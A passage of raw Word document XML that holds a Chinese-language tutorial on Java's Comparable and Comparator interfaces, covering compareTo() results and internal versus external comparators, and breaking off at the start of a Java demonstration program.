          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>o2”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；返回</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正数</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，意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“o1</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>大于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>o2”</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rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparator </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparable </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>比较</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是排序接口；若一个类实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口，就意味着</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该类支持排序</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rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是比较器；我们若需要控制某个类的次序，可以建立一个</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该类的比较器</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来进行排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们不难发现：</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内部比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>外部比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们通过一个测试程序来对这两个接口进行说明。源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.util.*;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.lang.Comparable;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> * @desc "Comparator"</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Comparable”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的比较程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> *   (01) "Comparable"</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>它是一个排序接口，只包含一个函数</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一个类实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>接口，就意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>该类本身支持排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，它可以直接通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Arrays.sort() </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collections.sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> *   (02) "Comparator"</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>它是一个比较器接口，包括两个函数：</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">compare() </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一个类实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
